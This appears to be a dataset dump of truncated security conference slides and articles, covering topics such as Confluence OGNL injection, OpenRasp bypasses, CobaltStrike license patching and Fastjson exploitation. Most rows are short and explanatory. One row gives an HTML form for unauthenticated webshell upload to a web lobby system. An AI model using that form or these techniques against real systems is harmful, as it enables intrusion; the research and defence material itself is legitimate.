text
stringlengths
100
9.93M
category
stringclasses
11 values
PowerShot Basic Oren Isacson, Alfredo Ortega August 1, 2010 Abstract An (incomplete) specification of the Basic language included in several Canon Powershot Cameras. 1 Contents 0.1 Executing Scripts . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 0.1.1 Format of the SD card . . . . . . . . . . . . . . . . . . ....
pdf
Confluence EL Injection via OGNL 0x00 前言 上一篇文章《Confluence SSTI via Velocity》中的漏洞原理较为简单,采用了正向分析的方法去还原漏 洞挖掘的过程,这篇文章主要从补丁去逆向分析、尝试独立构造出 POC。 0x01 简介 本文将要介绍以下内容: 介绍OGNL 基本语法 & 内置沙箱机制,并通过一些例子进行初步掌握 梳理 Confluence 处理 HTTP 请求的基本流程 分析 CVE-2022-26134 的补丁,然后独立构造 Exploit 0x02 表达式语言 OGNL OGNL 部分: OGNL 介绍 基本使用 (能看懂并定制 poc/exp) 实战利用 (...
pdf
Criminal Procedure Timeline ??? Stop Search Arrest Questions Appearance Bail Lets Make a Deal Trial ??? Something happens which causes the police to want to investigate you Stop Police are investigating something In order to stop you to investigate, police must have "reasonable articulable suspicion"...
pdf
Total Recall Implicit Learning as a Cyptographic Primitive Tess Schrodinger • Introduction • Curriculum vitae • Cognitive Memory • Consciousness • Sub consciousness Thoughts(&(Perceptions Memories(&(Stored(Knowledge Fears Violent(Motives Unacceptable(Sexual(Desires Irrational(Wishes Immoral(Urges Shameful(Experiences ...
pdf
1" 2" 3" 7" 8" 9" 10" 11" 12" This"is"how"networks"show"up"in"your"network"list"when"searching"for"wifi"networks" on"your"device." 13" When"you"join"a"network,"this"interacCon"happens." 14" 15" 16" KARMA"aKacks"do"exactly"the"same"thing"as"a"normal"associaCon,"it’s"just"an"evil"AP" instead"of"the"actual"AP"doing"it." 17...
pdf
"The further the spiritual evolution of mankind advances, the more certain it seems to me that the path to genuine religiosity does not lie through the fear of life, and the fear of death, and blind faith, but through striving after rational knowledge." -Albert Einstein Industrial Cyber Security From the Perspect...
pdf
知道创宇漏洞社区计划 知道创宇 张祖优(Fooying) S Z 漏洞社区 KCon 追求干货有趣的 黑客大会 Sebug 聚焦漏洞,提供漏洞威 胁情报信息与交易平台 ZoomEye 网络空间搜索 引擎,全球漏 洞感知与预警 K 过去 在过去,基于 ZoomEye 我们做了许多事 组件识别 通过自主研发引擎,我 们对网络空间进行了重 要端口探测与组件识别 开放搜索 我们公开了许多研究成 果,并开放海量结果数 据提供大家搜索 全球路由器后门探测 2014年2月份,我们针对 全球路由器进行全网扫描 并发出安全预警 摄像头漏洞探测 2014年3月,针对国外黑帽 大会曝光的家庭摄像头漏洞 进行全网的探测并发出预警 心脏出血 2014年4月,...
pdf
About me o What I am not? • Formally Educated • Developer • Hacker o What I am? • Interested How I am about to spend your time? o What is GoH? o What's behind it? o Not so wet T-Shirt contest o Node.js potential risks o Takeaways Game of Hacks – An idea is born using System; using System.Security.Cryptog...
pdf
Zhanlu Lab, Tencent Inc. 针对Docker容器网络的ARP欺骗 与中间人攻击 演讲人:王凯 Kame Wang 2019 关于我 • 王凯,Kame Wang; • 腾讯安全湛泸实验室高级研究员; • 中国科学院大学信息安全博士; • 研究兴趣包括:云安全、移动安全、区块链、自动化漏洞挖掘。 PART 01 研究背景 目录 CONTENTS PART 02 本地测试 PART 03 云端测试 PART 04 讨论与总结 01 02 03 04 • Docker及其虚拟网络 • ARP欺骗与中间人攻击 PART.01 研究背景 CLICK ADD RELATED TITLE TEXT, AND CLICK AD...
pdf
Exploiting Internet Surveillance Systems Defcon 18, 2010 Decius The “Great Debate” How should the information infrastructure of the future balance the individual’s desire for privacy with the state’s interest in monitoring suspected criminals? Steve Jackson Games Communications Assistance for Law Enforcement Act Co...
pdf
OpenRasp分析 OpenRasp分析 写在前⾯ ⼀些⽇志说明 正⽂ 初始化 为什么要将rasp.jar加载⾄Bootstrap类加载器 配置初始化 ModuleLoader类初始化 引擎启动 JS初始化 Checker的初始化 CustomClassTransformer Hook 回答上⾯遗留的ModuleClassloader的问题 如何绕过 基于正则的绕过 通过修改某些属性 覆盖插件 参考⽂章 写在前⾯ 花了点时间学习了下openrasp的核⼼代码,这⾥做下简单的分析 相关项⽬地址: ⽂件名 ⽂件内容 plugin/plugin-DATE.log 检测插件的⽇志,e.g 插件异常、插件调试输出 rasp/rasp-DAT...
pdf
Improving Antivirus Accuracy with Hypervisor Assisted Analysis Danny Quist Danny Quist Offensive Computing, LLC dquist@offensivecomputing.net Twitter: ocomputing Danny Quist Reverse engineer Automated reverse engineering Unpacker of strange malware RE Training Course Founder Offensive Computing Largest open col...
pdf
Ricky Lawshae, OSCP, GPEN March 23, 2009 Picking Electronic Locks Using TCP Sequence Prediction Abstract: Card reader systems are being relied on more and more frequently as a method of electronically controlling access to physical locations. These systems, especially in larger deployments, usually consist of RF...
pdf
apache proxy⸺ 0x00 apacheoverviewhttps://t.zsxq.com/ubm2rVf p apachhttps://t.zsxq.com/rBmaU7a hookhttps://www.anquanke.com/post/id/257539 0x01 p vscodec/c++ubuntuapache hook [root@centos httpd-2.2.23-worker]# export SHOW_HOOKS=1 [root@centos httpd-2.2.23-worker]# ./bin/httpd -k start Registering hooks for core.c H...
pdf
域渗透从⼊入⻔门到⾃自闭 前期准备 前⾔言 本系列列在于从简单的Windows域环境搭建到利利⽤用域的特性,通过哈希传递攻击、凭证窃取技术 结合互联⽹网公布现成的安全研究⼯工具,进⾏行行域横向移动渗透,最终到达我们⽬目标,拿到ad域控 制器器权限。 实验环境设置 下⾯面列列出本次实验环境计算机跟练习中的⼀一些配置设置,均在VMWARE下完成。 我们的域名将被命名为h4x0er.org公司,因此创建域,然后将这些PC电脑加⼊入域,let’s go! 本次实验环境⼀一共有三台电脑,⼀一台AD域控制器器DC,另外两台员⼯工PC。 系统ISO下载地址: https://msdn.itellyou.cn/ Windows Server 201...
pdf
侠盗猎车——数字钥匙Hacking 演讲人:@Kevin2600 @MonkeyKing 2 0 1 8 #Whoami @Kevin2600 银基安全研究员 专注无线电和嵌入式系统安全 会棍: KCON; XCON; 阿里先知; BESIDES; OZSECON; DEFCON26 PART 01 汽车钥匙简史 101 目录 CONTENTS PART 02 安米钥匙架构 & 功能 PART 03 安米钥匙攻击点分析 RF 干扰攻击 钥匙共享分析 蓝牙加密破解 01 02 03 PART 01 汽车钥匙简史 汽车钥匙 101 • 机械钥匙 (仍在使用) • 远程控制 (红外线; 固定码; 滚动码) • RFID (无...
pdf
BITSInject Control your BITS, get SYSTEM Dor Azouri Security Researcher @SafeBreach BITS Background & Terms PowerShell bitsadmin ... BITS Job Download Upload Upload-Reply COM Interfaces (C/C++) qmgrprxy.dll qmgr.dll State File More Background Available since 2001 (Windows XP) Most known use: Windows Update Advanced fea...
pdf
The Politics of Privacy and Technology: Fighting an Uphill Battle Eric Fulton, CEO SubSector Solutions Daniel Zolnikov, MT House Representative Note, a prettier and updated version of this presentation can be obtained by emailing: daniel.zolnikov@gmail.com or eric@subsectorcorp.com Daniel Zolnikov MT State House Re...
pdf
Bringing Sexy Back Breaking in with Style… Pentest? Really?!?! • Pentest has betting getting a bad rap lately • The demand hasn’t dropped off… • Testers hate doing it because its boring Why is pentesting boring? Its seldom about 0day, its most about lame php bugs or password cracking… Why is pentesting boring? Custome...
pdf
关于系统化应对 NSA 网络军火装备的操作手册 ©安天版权所有,欢迎无损转载 第 1 页 关于系统化应对 NSA 网络军火装备的操作手册 安天安全研究与应急处理中心(安天 CERT) 报告初稿完成时间:2017 年 05 月 22 日 06 时 00 分 首次发布时间:2017 年 05 月 22 日 08 时 00 分 本版本更新时间:2017 年 05 月 22 日 19 时 00 分 关于系统化应对 NSA 网络军火装备的操作手册 ©安天版权所有,欢迎无损转载 第 2 页 1 概述 北京时间 2017 年 5 月 12 日 20 时左右,全球爆发大规模的 “WannaCry”(中文名称魔窟)勒索软件感 ...
pdf
Network Mathematics - Why is it a Small World? Oskar Sandberg 1 Networks Formally, a network is a collection of points and connections between them. 2 Networks Formally, a network is a collection of points and connections between them. This is an abstraction which can be used to describe a lot of different systems (tec...
pdf
#BHUSA @BlackHatEvents Human or Not: Can You Really Detect the Fake Voices? Liu Xin, Tan Yuan School of Information Science and Engineering, Lanzhou University #BHUSA @BlackHatEvents Information Classification: General Contents  What’s Fake Voice  Introduction of AI-synthesized speeches  Existing Detectors  Existi...
pdf
《SRC混子是如何炼成的?》 SRC到底应该怎么搞? 来自漏洞之王的回复 来自月入几十万的大佬回复 又一个来自月入几十万的大佬回复 信息收集? 了解业务? 从基础架构分析 运维安全 业务安全 应用安全 内部安全 运维安全 基础服务 网络 服务器&设备 Web(Server 应用层 信息泄露 基础服务 ftp ssh telnet smtp dns smb snmp ldap rsync database vnc activemq elasticsreach hadoop …… 网络 DDOS 扫描 内网入口 服务器&设备 本地提权 SSL Bash WebServer Tomcat …… JBoss Resin Web(logic ...
pdf
RenderMan Michael “theprez98” Schearer render@renderlab.net theprez98@verizon.net HACKERS VS. DISASTERS Our hacker brains are pre-wired to find alternate uses for many devices. We look at the world as a puzzle to solve in everything we do. We can come up with the most extraordinary solutions to problems under the m...
pdf
强网杯-WP Author:Nu1L Team 强网杯-WP 强网先锋 bank web辅助 主动 侧防 upload baby_crt babymessage Siri Funhash 红方辅助 babynotes Just_a_Galgame 区块链 EasyFake IPFS Misc miscstudy Crypto fault modestudy Web easy_java babewp half_infiltration dice2cry Re aaenc flower safe_m2m firmware_blob imitation_game xx_warmup_obf Pwn direct easyoverflow leak...
pdf
Building a Threat Intelligence Program Michael Smith, CISSP-ISSEP APJ Security CTO mismith@akamai.com @rybolov ©2015 AKAMAI | FASTER FORWARDTM Straw Poll: What Is Threat Intelligence? Data feeds for purchase Big Data, Big Data, Big Data OSINT Output from a SIEM Tools dumps Executive reports Reporting fr...
pdf
某⼤厅后台未授权上传  <html><head> <meta charset="utf-8"> <title>.net版本活动⼤厅通杀本地上传webshell脚本</title></head><body> <form action="https://⽬标域名/后台后 缀/UpLoad/Savelmagesmethd="postenctype=multipart/form-data"> <label for="file">⽂件名:</label> <input type="file" name="Filedata" id="Filedata"> <br><input type="submit" name="submit" value...
pdf
Binder Fuzz based on drozer & Some interesting Vulnerabilities sharing (@0xr0ot) Kcon Beijing 2016 0xr0ot.sec@gmail.com Who am I • ID:0xr0ot(not 0xroot) • Security researcher(2 years) • Mainly focus on Android security • Always like basketball Agenda • drozer introduction • Binder fuzz model • Case share •...
pdf
MesaTEE SGX:借助 Intel SGX 重新 定义人工智能和大数据分析 Yu Ding 百度 X-Lab 安全研究员 May-29-2019 自我介绍 • https://dingelish.com • https://github.com/dingelish • https://github.com/baidu/rust-sgx-sdk • 在百度 X-Lab 担任安全研究员 • Rust 爱好者 • 漏洞利用/缓解领域博士 • 从事 Rust-SGX 项目 MesaTEE SGX 借助 Intel SGX 重新定义人工智能和大数据分析 适用于 隐私保护 计算的 Intel SGX • Intel SGX 背景 • 基于...
pdf
Confluence SSTI via Velocity 0x00 前言 之前的文章《CodeQL在Shiro550中的应用》的小结里有写到自己关于 漏洞分析 的浅薄理解, 机械地跟进代 码其实并没有太大的意义, 意识到这个问题后的自己也在刻意地练习自己写文章的风格, 希望能改掉一些不好的 习惯。 0x01 简介 本文将要介绍以下内容: 模板引擎 Velocity 基础使用 模拟挖掘 CVE-2020-4027 怎么选择切入点 遇到问题 解决问题的过程 逐步构造出可利用的 Exploit 漏洞复现 本文的侧重点: 思考 & 记录如何站在漏洞挖掘者的角度去正向地分析漏洞。 0x02 模板引擎 Velocity Velocity 部分...
pdf
Realtime Bluetooth Device Detection with Blue Hydra Granolocks Zero_Chaos Granolocks Narcissus ● Experimenter ● Developer ● Long walks in the woods ● Travel to exotic locations ● Hacking the planet ● Give great back rubs Zero_Chaos Narcissus ● Eagle Scout ● Open{Zaurus,Embedded,wrt} Maintainer ● Aircrack-ng Developer –...
pdf
MITM插件:SSRF公⽹出⽹检测 依赖条件: 需要配置 yak bridge 公⽹部署⽅案详情⻅https://github.com/yaklang/yak-bridge-docker 1. 使⽤Yakit配置好公⽹镜像 2. SSRF检测原理: 触发条件: 流经MITM的流量,应该过滤⼀下参数,疑似SSRF参数应该参与测试 1. 参数条件: 2. 参数名直接相关 redirect / url / url_callback / webhook / target .... 等 a. 参数值为 http(s?):// 开头的,可以直接替换成我们想要的SSRF⽬标 b. yaklang.io公⽹镜像反连体系 基础知识:https:/...
pdf
Insecure Internal Storage in Android Claud Xiao HITCON, Taipei 2014.08 It’s well known that in Android §  external storage is globally read/writable thus not secure; §  internal storage is isolated for each apps by sandbox thus is secure enough. §  By Google’s suggestion, applications store sensitive data a...
pdf
最近忍者师傅因为某件事情,寝食不安,所以给他写篇星球文,安抚他寂寞的心灵。 https://my.oschina.net/9199771/blog/5085337 书接上文,之前提到我们可以用java版的libinjection进行sql注入防护。 那么我今天花了一天的时间,在sqlmap的level=5 和 risk=3的情况下对拼接的sql进行安全测试,本文不涵盖tamper,否则本文的内容会异常复杂。 在试验过程中我发现,其实很多的报错情况,以及一些sql报错,可以看到一些 libinjection 没有对应防护策略的端倪。 上文中提到了GTID_SUBSET注入问题。 testing 'MySQL >= 5.6 AND e...
pdf
Dan Haagman, InfoSecurity 2009 HACKING FROM WEB APPS 7Safe Company Overview 2009 Secure Coding Course, © 7Safe 6/11/2010 Hacking Oracle from web apps 1 Sumit Siddharth Aleksander Gorkowienko 7Safe, UK Dan Haagman, InfoSecurity 2009 Pentesters @7safe Specialize in Application Security About US 7Safe Co...
pdf
VLAN hopping, ARP poisoning and Man-In-The-Middle Attacks in Virtualized Environments Ronny L. Bull⇤, Jeanna N. Matthews†, Kaitlin A. Trumbull‡ ⇤†Clarkson University {bullrl, jnm}@clarkson.edu ⇤‡Utica College {rlbull, katrumbu}@utica.edu Abstract—Cloud service providers offer their customers the ability to deploy virtu...
pdf
SCADA and ICS for Security Experts: How to Avoid Cyberdouchery James Arlen, CISA DEF CON 18 - Las Vegas - 2010 1 Disclaimer I am employed in the Infosec industry, but not authorized to speak on behalf of my employer or clients. Everything I say can be blamed on great food, mind-control and jet lag. 2 Credentials 1...
pdf
09/07/09 ken@ipl31.net 1 Fear and Loathing in Community Wireless Networks Ken Caruso – Co-Founder Seattlewireless.net, Freenetworks.org 09/07/09 ken@ipl31.net 2 Notice to CD Users  If you are reading this off of the CD, please note that I have a lot of info in the speakers notes, I like to keep the slides terse, ...
pdf
Transferability of Adversarial Examples to Attack Cloud-based Image Classification Service Dou Goodman(兜哥) @ Our Team X-Lab AI#Security#Research#@ Open#Source#Projects: Today’s Topics Cloud-based Image Classifier Service +perturbation Origin Adversary Class:#Cat# Score:#0.99 Class:#Flesh# Score:#0.99 ...
pdf
Switches Get Stitches: Episode 3 Then there were three of them. Who are we? Last episode on switches get stitches… Scalance X-Family < V5.0.0 echo -n "admin:password:C0A800020002F72C" | md5sum C0A8006500000960 C0A8006500001A21 C0A80065000049A6 C0A8006500005F31 C0A800650007323F This is the hash on the wire. M...
pdf
haya ATT&CK红队战术漫谈 ◉ haya ◉ 木星安全实验室 · 红队负责人 ◉ Github: https://github.com/hayasec ◉ Blog: hayasec.me ◉ 红蓝对抗与红队武器化 ABOUT ME 今天聊点啥? ATT&CK与红队攻击战术漫谈 ATT&CK矩阵(站在攻击者的视角来描述攻击中各阶段用到的技术的模型) 初 始 访 问 执 行 攻 击 权 限 维 持 权 限 提 升 防 御 绕 过 凭 据 获 取 数 据 披 露 横 向 移 动 目 标 数 据 收 集 内 网 数 据 窃 出 偷渡式攻击 外部程序攻击 硬件植入 USB复制 鱼叉式附件 鱼叉式钓鱼 供应链攻击 可信关系 有效帐户...
pdf
Interview with David MacMichael – February 13, 2006 by Richard Thieme David MacMichael is a former CIA Analyst, US Marine and historian. He was a senior estimates officer with special responsibility for Western Hemisphere Affairs at the CIA's National Intelligence Council from 1981 to 1983. He resigned from the CIA ra...
pdf
Securing Our Cyberspace Copyright © 2011 CyberSecurity Malaysia Ministry of Science, Technology & Innovation MAHMUD AB RAHMAN (MyCERT, CyberSecurity Malaysia) Reversing Android Malware Copyright © 2011 CyberSecurity Malaysia 2 Secu...
pdf
CobaltStrike 4.3 简单修改 几个月没有使用CobaltStrike了,因此最新的4.3,我也没有自己修改的版本。今天为了测试 HiveNightmare于是乎修改了下。 网上有@Twi1ight同学写的比较通用的CSAgent。 CSAgent使用需要引入jar包,并且windows下不能使用cobaltstrike.exe去启动。我个人还是习惯一个 cobaltstrike.jar,只做必要的修改,因此就自己修改了下。 主要修改了Authorization.class、BeaconData.class,两文件。 方便新手同学自己简单修改,我还是详细说下步骤: Authorization.java,我在代码中标注,...
pdf
ADVANCED WIRELESS ATTACKS AGAINST ENTERPRISE NETWORKS LAB SETUP GUIDE VERSION 1.0.2 Gabriel Ryan @s0lst1c3 @gdssecurity gryan@gdssecurity.com solstice.me Advanced Wireless Attacks Against Enterprise Networks Introduction © 2017 Gabriel Ryan All Rights Reserved 2 INTRODUCTION For this workshop, we’ll be usi...
pdf
Thinking Outside of the Console (Box) Squidly1 gameconsolez@gmail.com / haksys.schleppingsquid.net DefCon 15 / August 04, 2007 SaveDarfur.org HAXO(RED) See G. Mark FMI see him @ Hacker Jeopardy Crisis ongoing. Read up & help Squidly1 Squidly1  Computer Network Defense Team Lead (US Navy)  Former Red Team Lead  Inde...
pdf
6/25/11 Balancing the Pwn Trade Deficit Series: APT Secrets in Asia {Anthony Lai,Benson Wu,Jeremy Chiu} Xecure Founder and Researcher PK, Security Researcher 6/25/11 There is no national secret here  We welcome spies and SS here. Spies/SS are human, too :) 6/25/11 Why we are here again   Last  year, ...
pdf
Boutique Kit Playing WarGames with expensive rootkits and malware Josh “m0nk” Thomas Opening Question Hands up if you run Android Keep ‘em up if you run a custom ROM / Kernel Down if you actually compiled it Back up if you didn’t look at the source Back up if you didn’t do a FULL source audit Don’t lie, Santa ...
pdf
1 解决txt记录写文件的大小限制问题 1.0.1 前言 公众号NOP Team曾经发布一个名为“远程下载的通用替代方案|红队攻防”,文章链接为 https://mp.weixin.qq.com/s/Z1zp7klk--uQ1OnzljNESw,这篇文章有个痛点就是不能写入 太大的文件,本次tip目的为解决这个痛点。 1.0.2 解决思路 由于留给TXT记录的长度最长差不多为65515左右的原因,导致通过单词txt记录写入大文件成 为不可能。 解决办法就是制造多个txt记录写入文件再进行转换。如此一来大文件就可以写入了。 具体细节在下面脚本,这里就不过多描述,因为本来就很水 1.0.3 武器化 dnsWriteFile.py im...
pdf
1 shadow tls 最近看到v2ex上有⼈分享了⼀个有意思的技术 https://v2ex.com/t/875975 前⾔ 2 简单来说,这个技术可以在tls握⼿阶段实现完全合法有效的与指定域名⽹站的握⼿,⽽后续的传输数据 阶段则是传输⾃身的恶意payload。 这样我可以让tls握⼿阶段,SNI以及证书同步伪装,使得流量更加可信。 对应的demo项⽬ https://github.com/ihciah/shadow-tls 分析之前,先搞清楚tls的协议结构。 1. tls分为两层,记录层和握⼿层,记录层只有⼀种记录协议;握⼿层有4种协议,Handshake、Alert、 ChangeCipherSpec、App...
pdf
JS逆向|40分钟视频通杀⼤⼚登陆加密 收录于合集 #JS逆向 4个 介绍 书接上⽂Burpy|⼀款流量解密插件 属于配套了 其实这个⽀付宝案例已经发过⽂了,我实在是懒得写别的站点⽂章;重新录了个通杀的视 频,就以⽀付宝为案例讲解了,基本秒扣加解密函数,视频⾥有百度、爱奇艺、优酷、微 博都简单扣了⼀下,⼏分钟搞定,⼤家有案例的话也可以私发我。 点击下⽅图⽚跳转到视频 或访问: 2022-07-23 12:42 发表于北京 原创 不愿透露姓名的热⼼⽹友 ⼀位不愿透露姓名的热⼼⽹友 https://www.bilibili.com/video/BV16d4y1S7Su ⼀键三连啊看官们 下⾯就⽼⽂新发了,可以直接忽略不看。 ⽹站:aHR...
pdf
Are$we$creating$incidents? August$26,$2015$ 在 臺北$ Shin$Adachi,$CISSP,$CISM,$CISA,$PMP Shin$Adachi,$CISSP,$CISM,$CISA,$PMP 0 Disclaimer •  The$presentation$itself,$and$the$views$and$ opinions$expressed$by$the$presenter$therein$do$ NOT$reflect$those$of$any$of$my$affiliations$at$all.$ •  NONE$of$such$affiliations$above$th...
pdf
Backdooring the Lottery and Other Security Tales from Gaming July 30, 2017 Gus Fritschie and Evan Teitelman Presentation Overview 1. Introductions 2. What has happened since 2011 3. Historical overview of security incidents in gaming 4. Eddie Tipton and the lottery 5. Russian slot attacks 6. Conclusion © SeNet Inter...
pdf
Hacking travel routers like it’s 1999 Mikhail Sosonkin Mikhail Sosonkin “Synack leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints” Director of R&D Always a Student @hexlogic mikhail@synack.com ...
pdf
Key-Logger, Video, Mouse How to turn your KVM into a raging key-logging monster MEETTHETEAM Yaniv Balmas “This should theoretically work” Security Researcher Lior Oppenheim “The mad scientist” Check Point Software Technologies Check Point Software Technologies Security Researcher TOOMANYCOMPUTERS • Computers • Mo...
pdf
Lives on the Line Securing Crisis Maps in Libya, Sudan, and Pakistan DEFCON 19 - 2011 george chamales - rogue genius llc george chamales // DEFCON USA - 2011 The Humanitarian Technology Community needs your help. 2 george chamales // DEFCON USA - 2011 Crisis Aid Information Crisis Mapping Platform Reports Aid Aid 3 ge...
pdf
#BHUSA @BlackHatEvents A New Trend for the Blue Team Using a Practical Symbolic Engine to Detect Evasive Forms of Malware/Ransomware Hank Chen Sheng-Hao Ma Mars Cheng @hank0438 @aaaddress1 @marscheng_ TXOne Networks Inc. #BHUSA @BlackHatEvents Who are we? Hank Chen Sheng-Hao Ma Mars Cheng Manager PSIRT and Threat Re...
pdf
Breaking Wind: Adventures in Hacking Wind Farm Control Networks Jason Staggs, Ph.D. University of Tulsa Tulsa, Oklahoma whoami • Security researcher – Focus in control systems and network security • PhD in Computer Science from The University of Tulsa – Cellular networks, security engineering and forensics • Presente...
pdf
Nim https://nim-lang.org/ Nim,,js WebAssembly brew install nim brew install mingw nimble install winim gcl https://github.com/byt3bl33d3r/OffensiveNim demo Offensive Nim Nim Offensive Nim Test minidump_bin dump ​ shellcode shellcode_bin demo ​
pdf
This Space Intentionally Left Blank 1 Executive Summary ● Data in the air – Snatched by antennas – Antennas not protected – Antenna Farmers not all spooks ● Data pushed from antennas to Vault – Dropped off onto classified network – Data cannot come back up from vault ● Data packaged and pushed from vault to The Man – T...
pdf
Who am I and what am I doing? • Airscanner.com – Mobile Security (AV, firewall, sniffer) • Dissemination of Information – Reverse-engineering is a tool…not a weapon – Knowing your computer – Don’t steal…pay the programmers Legal Issues • Laws –No person shall circumvent a technological measure that effectively control...
pdf
Game of Chromes Owning the Web with Zombie Chrome Extensions Tomer Cohen April 2016 Sign-up Graph 1000 RPM 9000 RPM This is what we currently know… 10 Sec Attack Page Attack Page Google Web Store Extension Course of Action Inject Code Into Facebook tabs Open Wix Frame Transparently inside a Facebook page Sign Up to ...
pdf
Screw Being A Pentester - When I Grow Up I Want To Be A Bug Bounty Hunter Jake Kouns @jkouns Chief Information Security Officer (CISO) Risk Based Security Carsten Eiram @CarstenEiram Chief Research Officer (CRO) Risk Based Security N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y...
pdf
The Insecure Workstation II Bob Reloaded When not having access qualifies as a disability… Its not my fault, trust me! • The information provided in this presentation is for educational purposes only. I am in no way responsible for any damage that is the result of the use or misuse of the information provided in th...
pdf
Design and Implementation of a Quantum  Design and Implementation of a Quantum  True Random Number Generator True Random Number Generator What is True Randomness? What is True Randomness? ­ Must be unpredictable. ­ Must be unpredictable. ­ For a given set of binary data 'i',  the i+1 ­ For a given set of binary data 'i...
pdf
Hacking(Public(Warning(System(in(LTE( Mobile(Network Li, Weiguang weelight.li@gmail.com ( UnicornTeam@360 Technology ( Agenda 01(About(Public(Warning(System(in(LTE(Network( ( 02(The(Vulnerability(in(LTE(Protocol( ( 03(Trigger(the((Vulnerability( ( (a.(Build(a(Fake(LTE(Base(Station( ( (b.(Forge(the(Fake(Warning(...
pdf
FROM BOX TO BACKDOOR U s i n g O l d S c h o o l To o l s a n d Te c h n i q u e s t o D i s c o v e r B ac k doors in Modern Dev ic es Patrick DeSantis | @pat_r10t ADVANCED PERSISTENT THIRST (APT) ADVANCED PERSISTENT THIRST (APT) MOXA AWK-3131A WAP MOXA WAP: ABOUT “The AWK-3131A is 802.11n compliant to...
pdf
ANTHONY ROSE JACOB KRASNOV VINCENT ROSE 1 @bcsecurity1 2 Legal Stuff…So we don’t go to jail Training is for informational and research purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe tha...
pdf
Process Injection Techniques - Gotta Catch Them All Amit Klein, VP Security Research Itzik Kotler, CTO and co-founder Safebreach Labs About Itzik Kotler • 15+ years in InfoSec • CTO & Co-Founder of SafeBreach • Presented in Black Hat, DEF CON, HITB, RSA, CCC and more. • http://www.ikotler.org About Amit Klein • 28 yea...
pdf
Our Instrumented Life http://www.nydailynews.com/entertainment/tv/2010/06/07/2010-06-07_a_paparazzo_sits_for_his_portrait.html Greg Conti // West Point // gregory.conti@usma.edu The views expressed in this presentation are those of the author and do not reflect the official policy or position of the United States Mili...
pdf
McAfee 消灭Flash,彻底消除它 一份关于Flash攻击途径的全面的研究报告 演讲人:Haifei Li, Chong Xu 2019 PART 01 目录 CONTENTS PART 02 背景介绍 PART 03 PART 04 01 02 05 04 03 PART 05 Flash在浏览器环 境中的攻击途径 Flash在Microsoft Office中的攻击途径 Flash在PDF 中的攻击途径 总结 演讲者 Haifei Li. 安全领域知名的安全研究员。现就职 于迈克菲(加拿大)。研究领域包括(但不局 限于)微软的生态系统,真实攻击的攻击面分 析,下一代防御技术的安全研究及实现。他的 研究结果经常分享于主要...
pdf
RF Fuzzing // River Loop Security River Loop Security River Loop Security Designing RF Fuzzing Tools to Expose PHY Layer Vulnerabilities Matt Knight, Ryan Speers DEF CON RF Fuzzing // River Loop Security whois Matt Knight • Senior Security Engineer at Cruise Automation • RF Principal at River Loop Security • BE in ...
pdf
The Great Hotel Hack Adventures in attacking hospitality industry Etizaz Mohsin https://etizazmohsin.com Disclaimer No hotels were harmed during making of this presentation Do not try this at home! Images Courtesy: ANTlabs & INTSIGHTS What this talk is not about What this talk is about Biggest threats are simple not so...
pdf
Building the Pe rfe ct Evil Tw in Rich Mo gull Se curo sis, LLC e curo sis.co m Are n’t Evil Tw ins Old Ne w s? Ye p, but so is Jim m y Buffe tt and he still se lls o ut m o re sho w s than go d. e curo sis.co m Evil Tw in 1 01 X 1 . Inje ct de auth 2 . Ove rpo w e r AP and MiTM 3 . Enjo y pw nage e curo sis.c...
pdf
Mac OS X Server Windows Services Administration For Version 10.3 or Later 034-2356_Cvr 9/12/03 10:28 AM Page 1  Apple Computer, Inc. © 2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learnin...
pdf
Log browsing moves Data organization Examples Entropy-based data organization tricks for browsing logs and packet captures Sergey Bratus Department of Computer Science Dartmouth College Sergey Bratus Entropy tricks for browsing logs and packet captures Log browsing moves Data organization Examples Outline 1 Log browsin...
pdf
PAC101 PAC102 COC1 PAC201 PAC202 COC2 PAC301 PAC302 COC3 PAC401 PAC402 COC4 PAC501 PAC502 COC5 PAC601 PAC602 COC6 PAC702 PAC701 COC7 PAC802 PAC801 COC8 PAC901 PAC902 COC9 PAC1002 PAC1001 COC10 PAC1101 PAC1102 COC11 PAC1201 PAC1202 COC12 PAC1301 PAC1302 COC13 PAC1401 PAC1402 COC14 PAC1501 PAC1502 COC15 PAC1701 PAC1702 C...
pdf
OPERATOR HANDBOOK SEARCH.COPY.PASTE.L33T;) RED TEAM + OSINT + BLUE TEAM NETMUX V1 [02APR2020] 2 Operator Handbook. Copyright © 2020 Netmux LLC All rights reserved. Without limiting the rights under the copyright reserved above, no part of this publication may be reproduced, stored in, or introduced into a retr...
pdf
Biting the Hand That Feeds You 2007 Biting the Hand That Feeds You 1 Biting the Hand That Feeds You Storing and Serving Malicious Content from Well Known Web Servers Billy K Rios – Senior Researcher Nathan Mcfeters – Senior Researcher Kicking Down the Cross Domain Door ii Intended Audience This paper assumes...
pdf
Hacking Data Retention Small Sister your Digital Privacy Self Defense (brenno@smallsister.org) Brenno de Winter, wgasa • From the Netherlands • Self proclaimed geek • First program at age 5 • Focus on security, privacy • Writing, training, consulting • Wanna know more? Beer makes me talk! Privacy and anonimity are nee...
pdf
© 2007 Computer Academic Underground © 2007 Computer Academic Underground Real-time Steganography Real-time Steganography with RTP with RTP I)ruid I)ruid <druid@caughq.org> <druid@caughq.org> http://druid.caughq.org http://druid.caughq.org © 2007 Computer Academic Underground © 2007 Computer Academic Underground Who am...
pdf
作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com PHP 漏洞全解 1-9 PHP 漏洞全解(一)-PHP 网页的安全性问题 针对 PHP 的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval 注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL 注入攻击(SQL injection) 6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) ...
pdf
Fastjson1.2.80漏洞复现 2022-09-01 · Web安全 Fastjson于5月23日,在commit 560782c与commit 097bff1中更新了security_update_20220523的修复方案。调 整黑白名单的同时额外判断了 Exception ,并在添加类缓存mappings前新增了 autoTypeSupport 的判断。 显而易见 Exception 的派生类中出了叛徒,不久后fastjson-blacklist更新了黑名单类名,直到前几天漏洞作者i SafeBlue公开了思路与Gadgets,本文是对浅蓝师傅议题中留下的一点小作业的复现记录。 期望类与类缓存 不太了解的同学可以参考上一篇...
pdf
